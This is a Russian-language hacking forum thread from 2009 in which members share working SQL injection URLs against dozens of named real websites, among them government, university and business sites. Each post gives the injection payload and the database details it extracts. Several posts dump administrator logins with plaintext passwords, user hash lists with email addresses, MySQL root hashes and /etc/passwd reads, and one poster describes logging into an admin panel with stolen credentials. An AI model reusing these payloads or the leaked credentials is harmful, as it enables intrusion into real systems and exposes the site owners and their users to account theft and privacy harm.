Просмотр полной версии : SQL Инъекции
.:[melkiy]:.
22.03.2009, 14:40
http://www.mizangroup.jo/inner_links_en.php?id=-15+union+select+1,2,3,4,5,6,7,8,9,10--
Database Version: 5.0.67-community-log
Database name: mizangro_mizan
User name: mizangro_usermiz@localhost
]http://www.cdk.ru/event.php?id=-65'+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9,10,11,12,13--+
Database Version: 4.1.20-log
Database name: web60_db1
User name: web60_u1@localhost
log : :(
pass: qwer123
http://www.sesame-ip.eu/public/educ_cruise.php?cruise=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,pwd, user()),6,7,8,9,10,11,12+from+login+limit+0,1/*
Походу таблица с админовскими регами, но линк к админке не нарылся.
http://www.pokrishka.ru/discs_auto.html?model=-2500+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3--
Database Version: 5.1.30-community
Database name: shina
User name: shina@localhost
админки тут я нашел 2
http://www.pokrishka.ru/admin.php
http://www.pokrishka.ru/partners/admin.php
из базы выудил 2 логин пароля
administrator:shina33
admin:pokrishka33
подходит только второй логин:пасс во вторую админку...
http://www.autoshkola.com.ua/index.php?page=photo&lang=rus&idpr=37+union+select+1,concat_ws(0x3a,database(),v ersion(),user()),3,4,5--
4.1.22-standard-log
autos_webmix
autos_webmix@localhost
http://yulis-ek.ru/inner.php?all_news&details=-4+union+select+1,2,3,4,5,6,7,8,9,0,1--
Database Version: 4.0.24_Debian-10sarge2-log
Database name: yulis-ek
User name: yulis-ek@localhost
вывод в title
http://www.shinexpress.ru/all_info.php?cat_info=3+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7--
5.0.67-percona-b5-log:st176-web:st176-web@localhost
http://www.autoweek.com.ua/modules.php?op=modload&name=News&file=article&sid=-2108+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1--
4.1.22-log:autoweek:u_autoweek@localhost
http://finnews.ru/exch_punkts.php?region=-1+UNION+SELECT+concat_ws(0x3a,login,passwd,fio,per m)+from+t_users+limit+5,1--&curr=USD
Database Version: 5.0.67-log
Database name: u13279
User name: u13279@10.10.223.209
http://www.consumer-education.eu/?f_cid=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,Lo ginName,LoginPass,Email),10,11,12,13,14+from+_tabU zivatele/*
Login:SuperAdmin
pass:ASAP
Выборка по админам.
http://www.consumer-education.eu/admin/ логинимся.....
.:[melkiy]:.
22.03.2009, 20:19
http://www.onespiritmartialarts.com/information.php?cat=news&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.21-standard
Database name: onespirit_db
User name: user_onespirit@localhost
Юзеры:
[1]betrayz:e664b4445ba17a97962ada2740a85043
[2]:tatesrey:955bfb24aa1f034b654741d0c5024f63
[3]:Fat_Mike:b06265e78e4b53ecf9b19b67e440b2b0
[4]:thaiking:b06265e78e4b53ecf9b19b67e440b2b0
[5]:HR_BILL:b06265e78e4b53ecf9b19b67e440b2b0
[6]:blkscorp:b06265e78e4b53ecf9b19b67e440b2b0
[7]:suntzuaow:b06265e78e4b53ecf9b19b67e440b2b0
[8]:Hillary:b06265e78e4b53ecf9b19b67e440b2b0
[9]:rocca_rocca:b06265e78e4b53ecf9b19b67e440b2b0
[10]:DaBears:b06265e78e4b53ecf9b19b67e440b2b0
[11]:Alex:b06265e78e4b53ecf9b19b67e440b2b0
[12]:Diane73:b06265e78e4b53ecf9b19b67e440b2b0
[13]:johnnyQB:b06265e78e4b53ecf9b19b67e440b2b0
[14]:RedBull99:b06265e78e4b53ecf9b19b67e440b2b0
[15]:garkaviud:94e05df963c698659302c13d73af2de9
[16]:Nickytime:b06265e78e4b53ecf9b19b67e440b2b0
[17]:niagara:e31da09a7e4fd35a379f53838adb323d
[18]:leeroy:bf779e0933a882808585d19455cd7937
[19]:fpetatertott:0e97a5f425cd8ec32f2b85919ac882ba
[20]:tatertott:fc8b24798df050b4a65787f17f800c17
[21]:TrevolHelper:2fea504f51f73d921131a701985dcd04
[22]:Johnny2Fist:b06265e78e4b53ecf9b19b67e440b2b0
[23]:mayor:f96f9912346f00aecc56420d1d074007
[24]:MainDadyFirst:98ec24a321731b08d39976fa06d77fff
[25]:RohanYaakov:12e515aa4500ddc17d67355943a89b50
[26]:Andy:1a08c859899ffdb654cf946b38b7dadc
[27]:Shawn:6f8af72e0a79429cd9b8d1546d90c0d4
[28]:guamymouttnen:789b809d87bde5c97b002ed7874f5600
[29]:Dennis:d16d03028a9d03d9098db9d2d5a695d4
[30]:pyratechick:9e79a6144aae0adae9a322265198fc68
[31]:Marat:e31da09a7e4fd35a379f53838adb323d
[32]:jumpkickjon:a6724eb2da65e96099386342fe4b6c77
[33]:CefgootoKeype:a008948daa6e7fa44c1d96c7e6056c0b
[34]:fanaticsep:5a1640ae50604d6b5e03adc1c2365cd6
[35]:gymnadvadia:5526c74704f1243f626db2848eb564ee
[36]:onlinepornrpon:4479842dd2b3220c85a95e9e2f323f2d
[37]:mazdacazda:bf16b9e58e38e3f90d647e42371c2c69
[38]:tenoenesq:5e26c2c2ba57bbe63b2940d695df164f
[39]:VTCHRISTIE:6036052f8c203d32cc680b5d71bc716f
[40]:fuckahmadenagad:fbbf0df68a1929f5878b794bbc290f8e
[41]:J_B:6d8e5be200a835beb77d899f00b890a5
[42]:James:053a88bf2912a032fe9ec0cf56d4e528
[43]:edmac:f06cb7b0c68c70678c6dc283afee4c76
[44]:brad:517c1fc74b014bf0419debad857e0583
[45]:Melanie:352ad5a293c7a1c38be28965ae5a1645
[46]:MonicaH:edccf286ccd738e8c4fc1ed56e10aced
[47]:bmaurer:1a6a1b6fd23a41cdc097526f09c877ad
[48]:Som:86ebb2f3a7a183cc8f7479bb0c52ccbd
[49]:tmessick73:55608d6a3a1c654be4d0d5f153d8e420
[50]:Chris:3106ad9a77f361f6fa4c6b591171f138
[51]:FranStarr:dbea94528f2cb5d5c5fcfdc4de7a8aa9
[52]:brianchang:acb80815e691b3ecc2a104a12fb5930e
[53]:philh3:a17430ca6bc4f30a7345ddff85819921
[54]:houdiepatootie:aafa81b88f53c4a6635bf2d4877df724
[55]:maria:3668fd5c877ae4f37c5138056cec13c3
[56]:techdragon:1671c6ae4eedf7fe0197935aecbbb400
[57]:chaichat:3fd002edc1741e97164d976c98f36998
[58]:kickin_booty:5f4dcc3b5aa765d61d8327deb882cf99
[59]:Rockin_Fist:5f4dcc3b5aa765d61d8327deb882cf99
[60]:BlkButterfly:2c0948930e1d10f9eff79787d8065dad
[61]:Fleeveloniero:e4296a5fecb89bd4ae507801fa3f71ec
[62]:HomaivaHick:45ffaa5a82c516fabe0932e2b55a5611
[63]:Heerpinee:e480435750dd9aadf9b2b8fde3ef4f3d
[64]:amummaomizaxy:aa85b79122a874b26e87cb769d40bf85
[65]:astendina:f60c8f4363374dc48cb182ae225ebd87
[66]:cedaBaina:0b9f4cac06360b1629f09eaf5f4623ac
[67]:Moinnytancy:74794f4521dbcfc51f447c19dc9dadfe
[68]:Lindmannnn:76b4497543fb53b48d3634026a4e6be9
[69]:kastarz:b863cf827d52590568872d8490a1f932
[70]:TeesBimb:8ac25f3f2d77816d50d692027be48fb9
[71]:Amoufffic:8ac25f3f2d77816d50d692027be48fb9
[72]:EMAIDLICDYDAY:0f2e3eb482a73487e9e6b46976a8ded8
[73]:DixBarappoida:be12b41915d98d60210451518730b9b3
[74]:Hajemipem:d174d702ef805627f5f079445990ca61
[75]:lienoureobelF:b769cf9c4c7728e0d12200a2029e7cdb
[76]:JohnVK:7ccd8f39aeed5558e62bdc1aa928b7dd
[77]:suiclewew:128421cfae1425c3a7b56dfd5ea40e94
[78]:shumomifan:412c72738d1f15f20c05224f4f1c70ba
[79]:Vahid:dc855c92329ffba92c608cd6d3b900c5
[80]:mherring:c6e83965fedb97e17664cf3bc6171235
[81]:YOChristopher:12d20a36a68eaf350c68b3e45ba1a886
[82]:SteveT:49d22931473fb7214f64804e09aae3de
[83]:McStivenLou:b0c9cd72a019a6617c9a8d134d2c0cf7
[84]:JRockwell:0c83279e6e0c24896825ac459435f623
[85]:Webwhiteman:dae457420fde145e136a473a31647651
[86]:maxfreemann:2d16a2e9d88a11a53fbe5048da9c3f95
[87]:ISeduction:3a824c5972104d8529462ed8117f5c7a
[88]:LararoGO:264b12ae604642520e73317bfd2a17d6
[89]:Ferafloalf:c3b69388b313e571fe008b3ae6eff2ac
[90]:sdriseeo:acd6453580b959ec3ca4fa659a74668a
[91]:stjhonecity:04cb23d2ed99f48531d335cf0bb4ad21
[92]:ScottAL:79bd522ea6c2a26ad7f60a72ed516175
[93]:PWRichard:4a06a98757f1634a4937cd688a87dd76
[94]:LFJohn:f9dc535fdfb997db20f1aed51c738ea7
[95]:AntonPotaPo:9007a657330e4241bc2fdc00b11d0c9f
[96]:mstobil:eb15061b2a7c148d8463403731f526ff
[97]:SendrikBlack:a762072f07ff345b334d29b002190907
[98]:ESLuis:98bc69e0950bfdaf3d6abbcb67eb9ea1
[99]:refeywal:ab85b7a32f05f684962a03bb4ab562b9
[100]:Elizabetrt:7f710ef317f86070a1c2874dca433f87
САЙТ Гор. Харькова
http://www.kharkov.ua/industry/dblist.phtml?prom=-33+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1--
4.0.26-log:poisk:poisk@localhost
_http://www.regentherapy.com/back.php?id=-58'+union+select+1,2,version(),4,5,6,7/*
4.1.22-standard
САМАРА Сегодня
http://www.samaratoday.ru/news.php?id=-166793+union+select+1,2,3,4,5,concat_ws(0x3a,versi on(),database(),user()),7,8,9,0,1,2,3,4,5,6,7--
Database Version: 5.0.45
Database name: samaratoda_news
User name: samaratoda_news@localhost
16 :In database information_schema found table USER_PRIVILEGES
1 : GRANTEE
2 : TABLE_CATALOG
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
17 :In database information_schema found table VIEWS
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : VIEW_DEFINITION
5 : CHECK_OPTION
6 : IS_UPDATABLE
7 : DEFINER
8 : SECURITY_TYPE
18 :In database samaratoda_news found table authors
1 : idAuthor
2 : nameAuthor
3 : orgNameAuthor
4 : emailAuthor
19 :In database samaratoda_news found table comment
1 : idComment
2 : idNewsComment
3 : dateComment
4 : nickComment
5 : textComment
6 : emailComment
7 : ipComment
20 :In database samaratoda_news found table confirm
1 : idConfirm
2 : dateExpirate
3 : random
4 : idUser
21 :In database samaratoda_news found table groups
1 : groupid
2 : groupname
22 :In database samaratoda_news found table grouptouser
1 : grouptouserid
2 : userid
3 : groupid
23 :In database samaratoda_news found table indexDayCache
1 : cacheIndex
2 : idNews
3 : dateNews
4 : headNews
24 :In database samaratoda_news found table links
1 : idLink
2 : nameLink
3 : urlLink
4 : idRubLink
5 : idTopicLink
6 : exportFlagLink
25 :In database samaratoda_news found table login_jour
1 : idLogin
2 : dateLogin
3 : ipLogin
4 : idUserLogin
26 :In database samaratoda_news found table mylog
1 : Id
2 : log_time
3 : logtext
27 :In database samaratoda_news found table news
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
16 : urlOrigNews
17 : urlCitNews
28 :In database samaratoda_news found table news2006
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
29 :In database samaratoda_news found table news_arch
1 : idNews
2 : dateNews
3 : idRubNews
4 : idAuthorNews
5 : idPhotographerNews
6 : headNews
7 : lidNews
8 : bodyNews
9 : sourceNews
10 : priorAttrNews
11 : urlSourceNews
12 : titleImgNews
13 : showAnnonceNews
14 : textAnnonceNews
15 : autoDayNews
16 : urlOrigNews
17 : urlCitNews
30 :In database samaratoda_news found table news_cache
1 : cacheIndex
2 : idNews
3 : dateNews
4 : idRubNews
5 : idAuthorNews
6 : idPhotographerNews
7 : headNews
8 : lidNews
9 : bodyNews
10 : sourceNews
11 : priorAttrNews
12 : urlSourceNews
13 : titleImgNews
14 : showAnnonceNews
15 : textAnnonceNews
16 : autoDayNews
31 :In database samaratoda_news found table news_log
1 : idLog
2 : idNews
3 : dateNews
4 : idRubNews
5 : idAuthorNews
6 : idPhotographerNews
7 : headNews
8 : lidNews
9 : bodyNews
10 : sourceNews
11 : priorAttrNews
12 : urlSourceNews
13 : titleImgNews
14 : showAnnonceNews
15 : textAnnonceNews
16 : autoDayNews
17 : userId
18 : date_zapros
19 : zapros
20 : urlOrigNews
21 : urlCitNews
32 :In database samaratoda_news found table news_topics
1 : idNews_Topic
2 : idNews
3 : idTopic
33 :In database samaratoda_news found table news_users
1 : idNews_User
2 : idNews
3 : idUser
34 :In database samaratoda_news found table photographers
1 : idPhotographer
2 : namePhotographer
3 : orgNamePhotographer
35 :In database samaratoda_news found table rubrics
1 : idRubric
2 : nameRubric
3 : lidRubric
4 : sortIdRubric
36 :In database samaratoda_news found table seqid
1 : idSeq
2 : dummy
37 :In database samaratoda_news found table seqid_t
1 : idSeq
2 : dummy
38 :In database samaratoda_news found table subscr_users
1 : userid
2 : username
3 : passwrd
4 : email
5 : firstname
6 : lastname
7 : middlename
8 : countryid
9 : state
10 : city
11 : zip
12 : address
13 : phone
14 : cellphone
15 : pgrphone
16 : pgrnumber
39 :In database samaratoda_news found table subscribe
1 : subscribeId
2 : created
3 : subscribeName
4 : subscribePeriod
5 : userId
6 : confirm
40 :In database samaratoda_news found table topics
1 : idTopic
2 : nameTopic
3 : actualAttrTopic
41 :In database samaratoda_news found table update_status
1 : id_update_status
2 : update_time
3 : update_finished
42 :In database samaratoda_news found table user_rubric
1 : idUser_rubric
2 : idUser
3 : idRubric
43 :In database samaratoda_news found table users
1 : userid
2 : username
3 : passwrd
4 : email
5 : firstname
6 : lastname
7 : middlename
8 : countryid
9 : state
10 : city
11 : zip
12 : address
13 : phone
14 : cellphone
15 : pgrphone
16 : pgrnumber
в табличку USERS тока 2 записи:
[1]:1:Светлана:111111:svgor@bk.ru
[2]:2:Alex:8e956352ad5b3a54076586b4f612b601:balex42@g mail.com
второй хэш не осилил)
mailbrush
23.03.2009, 00:39
http://www.kcsoul.com/urban-events-calendar/detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28
user() : database() : version()
sherryml_genuser@localhost : sherryml_db : 5.0.45-community
ПаВлУшКа
23.03.2009, 00:49
http://www.ppi-jepang.org/print.php?id=-61+union+select+1,2,3,version(),5,6,7--
http://ebursa.depdiknas.go.id/pustaka/ptk/record.php?id=-28%20union%20select%201,2,table_name%20from%20info rmation_schema.tables--
mailbrush
23.03.2009, 01:10
http://www.mef.gov.kh/new_mef/macroeconomic-detail.php?eid=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6
user() : database() : version()
mefgovkh_web@216.65.1.253 : mefgovkh_web : 5.0.32-Debian_7etch5~bpo31+1-log
http://www.passionforstone.eu/index.php?id_sect=-1+union+select+concat_ws(0x3a3a,user(),database(), version())--
Админка по адресу: http://www.passionforstone.eu/admin/login.php
В базе отсутствуют поля отвечающие за аутентификацию. Или разделение прав или прописано в файлах.
laedafess
23.03.2009, 01:39
http://www.foresia.com/images/index.php?pageid=217204'+union+select+1,2,concat_w s(0x3a,user(),database(),version()),4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2+--+
user(): Stamco02@stamco.mynewserver.com
database(): stamco
version(): 4.1.22
PR: 3
---------------------------------------------------
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,concat_ws(0x3a,user(),data base(),version()),5,6,7+--+
http://www.kincrome.com.au/web/media/media.php?AID=-220'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7+--+
user(): b2becat@10.0.0.16
database(): Kincrome
version(): 5.0.56sp1-enterprise-gpl
PR: 4
---------------------------------------------------
http://www.mirabili.it/fotobis.php?idevento=-29+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6/*
user(): mirabilidb@localhost
database(): mirabili_it
version(): 4.0.24_Debian-10sarge3-log
PR: 4
http://trentondevils.com/page.php?pid=-228+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
Database Version: 4.1.20-log
Database name: tdevils_db
User name: tdevils@localhost
http://www.initiativeforpeacebuilding.eu/resource.php?c=-1+union+select+1,concat_ws(0x3a3a,user(),version() ,database()),3,4--
http://www.initiativeforpeacebuilding.eu/Admin <- Basic auth
M.W.N.N.
23.03.2009, 04:48
http://www.vsmc.com.vn/news_detail.php?id=19+union+select+1,2,concat(vers ion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+limit+1,1
version():5.0.67-community
database():vsmccom_datavsmc
user():vsmccom_sisoft@localhost
ПаВлУшКа
23.03.2009, 15:32
http://www.textile.web.id/member/index.php?id=-21+union+select+version(),2,3,4--
http://www.iwandarmansjah.web.id/medical.php?id=-309+union+select+1,2,3,unhex(hex(version())),5,6,7 ,8,9--
.:[melkiy]:.
23.03.2009, 16:25
http://www.zeland.ru/index.php?inside=1&page=news&id=-12+union+select+1,2,3,4,5,6--
Database Version: 5.0.67
Database name: b30500_zelan
User name: u30500@78.108.85.11
http://www.lbn.lv/?op=news&id=-1+union+select+1,2,3,4,5--
Database Version: 5.0.24-community-nt-log
Database name: lbn
User name: lbndb@localhost
Вытаскивать из USERS
http://www.alatus.ru/?a=news&id=-87+union+select+1,2,3,4,5/*
Database Version: 4.1.22-standard-log
Database name: alatusr_1
User name: alatusr_user@localhost
ТОВ "Укрреставрацiя"
http://www.ukrrest.kiev.ua/?module=building&id=-5+union+select+1--
Database Version: 5.0.22
Database name: ukrrest_main
User name: ukrrest_root@localhost
Login:admin
Pass:b0fb7de8ea0d4fce95fc0e4ded766b30: 93UhAwTSYRUL4V7p
--
Login::ppfnetua
Pass:c82982351c43978caa37cbc4df9c8807: kwfgOSZQxjGL4bDE
Вытаскивать из jos_users
http://www.frentanarent.it/sezioni.php?titolo=news&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.22
Database name: frentana
User name: ftp_frentana@localhost
Login: novatek
Pass: 8b6068265e60d456b7b25160f965bc24 : ??
spherics
23.03.2009, 18:25
http://www.lensmodern.com/gallery_list.php?id=980986543+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version() ,user(),database()),16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37--
Database Version: 5.0.37
Database name: lensmodern_db
User name: lensmodern_user@localhost
Админы
http://www.lensmodern.com/gallery_list.php?id=980986543+UNION+SELECT+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,CONCAT(0x3a,(SELECT+CONC AT(a_username,0x3a,a_password,0x3a,a_email)+FROM+l ensmodern_db.admin+LIMIT+0,1),0x3),16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
a_username : a_password : a_email
:mark.d.williams: lt06umr:mail@markdw.com
:dan.tierney: t1E7nEy:dan@thedairystudio.com
:bob.miller: b1gbadbobMiLLer:lensmiller@btinternet.com
:peter.parker: p47KeR:peter@pparker.net
:max.forsythe: m4rv1n:max@maxforsythe.com
:christine.hanscomb: ger4n1um:
:amy.somers: jellyfish:
:jackie.kelley: frAnkIE746:jackie@lensmodern.com
:lucy.levene: 1ucyl4vin8:Levene
:mick.dean: lens59240tmp:
:graham.fink: lens59240tmp:
.:[melkiy]:.
23.03.2009, 18:48
Рибний дiм - завжди для Вас (UA)
http://fishhouse.ua/index.php?page=news&id=-1+union+select+1,unhex(hex(concat_ws(0x3a,version( )))),3,4--
Database Version: 5.0.45-log
Database name: farafon_wp
User name: farafon_fish@localhost
Login: admin
Pass: $P$BQDOb1JojYXIycHmyQPf.77BLr9mMS : ??
-------------------------------------------------------------------------------------------------------------
Интернет-конференция (RU)
http://www.omskedu.ru/conferens/?act=news&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Database Version: 5.0.45
Database name: omskedu4
User name: omskedu4@localhost
Есть доступ к mysql.user
Юзеры:
root:*504A925BE381D892D1A8B7116ACA4E4770D1EBB2
ftp:*29D1A31AD3238E133B3A0895D8AEEAA0ADC8FB01
exim:*DE4F5285A470F9A34B8001E28A1A06031EDE134F
wikiuser:*3036C6FAA0B1CBE8EB353EE034089A6E6F5F0ABF
wordpress_us:*D9F1725A36F280EF7E68C2980ED47D155CB7 2AAA
omskedu4:*225BAFCA9D85596DB6945B9B1847FB3AC9B80A30
omskedu4_opek:*9FD2F9A0394B759E1583078CC6505EF4FF6 484FC
nikolay:*DA5FC28583221F4C3BD02A8DB8DB84E23B3429C1
vmo:*0683137856DF9D97B7010E9D2E4E35E443F6E7F8
zuka66_ru:*0BA118402CBA45875701B918B78B197AEBA3844 A
sms-mt:*330C2ABD438F5E7461EBB9322ACAFF68DE65A18D
ecdicus:*132070F992A6095B2E40B677B79C94B9BEAE2F01
roundcubemail:*14A782DB6604FB29456A72A2B7C05F5EF6A 5360C
rrc:*00D6FF856004B95535175644054E2747E0EF25B6
spherics
23.03.2009, 19:26
http://mysecret.tv/secret.php?id=9798756454332+union+select+1,2,conca t_ws(0x3a,version(),user(),database()),4,5,6,7--
Database Version: 5.0.58
Database name: mysecret
User name: mysecret@localhost
http://mysecret.tv/secret.php?id=9798756454332+UNION+SELECT+1,2,CONCA T(0x3a,(SELECT+CONCAT(username,0x3a,password,0x3a, access,0x3a,email)+FROM+mysecret.user+LIMIT+1,1),0 x3a),4,5,6,7--
username : password : access : email
:admin : mys3cr3ts : 10 :stdrovia@digitaldk.com
http://www.universalexportltd.com/view_item.php?id=108098097650+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29--
Database Version: 4.1.20
User name: exportUser@localhost
Database name: universalexport
TGP
http://www.selfpp.com/gallery.php?ID=9809879698702+union+select+1,2,3,4, 5,6,concat_ws(0x3a,version(),user(),database()),8, 9--
Version: 4.1.22-standard-log
User: selfpp_selfpp@localhost
Database: selfpp_tgp6
site: http://www.homeobooks.ru
http://www.homeobooks.ru/books.php?id=-307+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24--
database : 5.0.67-log
name_data_base : u18936
user : u18936@10.10.153.183
login : admin
pass : uchisprogat
users
sma111:npkssk
shild:shild
+limit+1,1+
http://www.gkh-reforma.ru/forum/view_all_topic.php?m_id=466+union+select+1,2,conca t_ws(0x0A,database(),version(),user()),4,5,6,7
database u40032_forum
version 5.0.67-log
user u40032@10.10.223.205
sql-inj в движке frb 4.0 lite :)
поковыряйте, кто-нить :)
http://www.bgmim.org/enlinks.php?id=-3+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10
Database Version: 5.0.67-community
Database name: avis91_euro26
User name: avis91_admindb@localhost
http://www.bgmim.org/admin
radina:803058
http://all-photo.ru/all-moscow/index.ru.html?kk=efc0be737d&img=-20899+union+SeLect+1--
Database Version: 4.1.22
Database name: photo
User name: photo@all-photo.ru
ПортТелеком
http://www.ptkom.ru/new/news/?id=-23+union+select+1,2,3,column_name,5,6+from+INFORMA TION_SCHEMA.columns+where+table_name=0x70746b6f6d5 f61646d+limit+1,1--
user(): draft@localhost
database(): draft
version(): 5.0.60
PR=5
тИЦ=30
table ptkom_adm
http://www.ptkom.ru/new/news/?id=-23+union+select+1,2,3,concat(id,0x3a,login,0x3a,pa ss),5,6+from+ptkom_adm+limit+0,1--
id:login:рass
1:рtkom_user:9d08d11a016deb735240e8bbb2e13788
http://www.hoteli.bg/designs/classic2_en.php?id=143+UNION+SELECT+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 ,59,60,61,62,63,64,65,66,67,68,69,concat_ws(0x3a,v ersion(),database(),useR()),71,72,73,74
Database Version: 5.0.67-community
Database name: hotelib_hoteli
User name: hotelib_site@localhost
.:[melkiy]:.
23.03.2009, 23:58
Virtual Radio
http://www.vradio.org/radiostations.php?id=-93+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 4.1.21
Database name: vradio
User name: vradio06@localhost
spherics
24.03.2009, 00:23
https://archserv.arch.vt.edu/equipment/type.php?id=798796959872+union+select+1,2,concat_w s(0x3a,version(),user(),database()),4,5--
Version: 5.0.37
User:search@localhost
Database: archweb
PageRank = 5
http://www.oncars.com/news-blogs/viewStory.php?id=9687687609872+union+select+1,2,3, 4,5,6,7,concat_ws(0x3a,version(),user(),database() ),9,10,11,12,13,14,15--
Database Version: 5.0.51a-18-log
Database name: oncarsdata
User name: oncars_admin@64.22.128.61
M.W.N.N.
24.03.2009, 00:47
http://www.sozialnetz-mil.de/details2.php?id=77%27+union+select+1,concat(versio n(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():db1032133-test
user():dbu1032133@localhost
http://www.sushi-market.ru/catalog.php?view=product&id_kuhnya=1&id_cat=4&id=-1+UNION+SELECT+concat(login,0x3a,pass),2,3+FROM+us ers+LIMIT+0,1/*
4 версия, вывод в тайтле
Админка тут http://www.sushi-market.ru/admin
Где лежат админы - хз
spherics
24.03.2009, 01:03
PageRank = 6
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,version(),user(),database()),7,8,9,10,11 ,12,13--
Database Version: 5.0.45
Database name: FAD
User name: admin@localhost
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+union+select+1,2,3,4,5,conca t_ws(0x3a,user,password),7,8,9,10,11,12,13+from+my sql.user--
pma_0QzUtRnrJLEV : 17262bd87c9d234c
admin : 63da210b5b938bd4
test : 22adbe442782abc1
Читаем: etc/passwd
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),7 ,8,9,10,11,12,13--
Читаем: /etc/httpd/conf/httpd.conf
http://www.sunyopt.edu/faculty/viewprofile.php?ID=92+UNION+SELECT+1,2,3,4,5,CONCA T(0x3a,LOAD_FILE(0x2F6574632F68747470642F636F6E662 F68747470642E636F6E66),0x3a),7,8,9,10,11,12,13--
M.W.N.N.
24.03.2009, 02:32
http://pascn.pids.gov.ph/resprojects.phtml?stid=4+union+select+1,concat(ver sion(),0x3a,database(),0x3a,user()),3,4/*
version():4.0.23-standard
database():APEC
user():pascn@203.167.111.188
http://www.chambers-bank.com/location_details.php?id=1+union+select+1,2,concat( version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9 ,10,11,12+limit+1,1/*
version():4.1.22
database():CHECKIN_DB
user():CHECKIN_ADMIN@216.81.70.64
dr.Pilulkin
24.03.2009, 03:13
http://www.astrofest.ru/page.php?id=-1303+union+select+1,2,concat_ws(0x3a,user(),versio n(),database())--
ostapenko_afest@localhost:4.1.22:ostapenko_afest
http://www.beermachine.ru/katalog.php?id=-5+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4--
u28651@10.10.153.174:5.0.67-log:u28651
.:[melkiy]:.
24.03.2009, 04:15
http://www.divoclub.ru/katalog.php?id=-20+union+select+1+from+mysql.user--
Database Version: 4.1.16
Database name: DIP
User name: root@localhost
Есть достyп к mysql.user
mailbrush
24.03.2009, 11:31
http://www.karabas.info/item/ru/moskow/sale/lg/lg_200/-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,concat_ws(0x3a,user(),dat abase(),version()),25,26,27,28,29,30,31,32,33,34.h tml
user() : database() : version()
karabas_svalka2@localhost : karabas_svalka2 : 5.0.67-community
http://forum.antichat.ru/showthread.php?p=1187222#post1187222
spherics
24.03.2009, 17:40
http://www.dosgraveyard.com/game.php?id=7987986446+union+select+concat_ws(0x3a ,version(),user(),database()),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--
Database Version: 5.0.51a
Database name: dosgraveyard
User name: dosgraveyard@77.232.68.30
http://www.dosgraveyard.com/game.php?id=7987986446+UNION+SELECT+CONCAT(0x3a,(S ELECT+CONCAT(username,0x3a,password)+FROM+dosgrave yard.members+LIMIT+0,1),0x3a),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18--
: abdalis : 06c219e5bc8378f3a8a3f83b4b7e4649
: diggyboy : 06c219e5bc8378f3a8a3f83b4b7e4649
http://stardustobservatory.org/image.php?id=798798654479+union+select+1,2,3,conca t_ws(0x3a,version(),user(),database()),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20--
Database Version: 5.0.67.d7-ourdelta-log
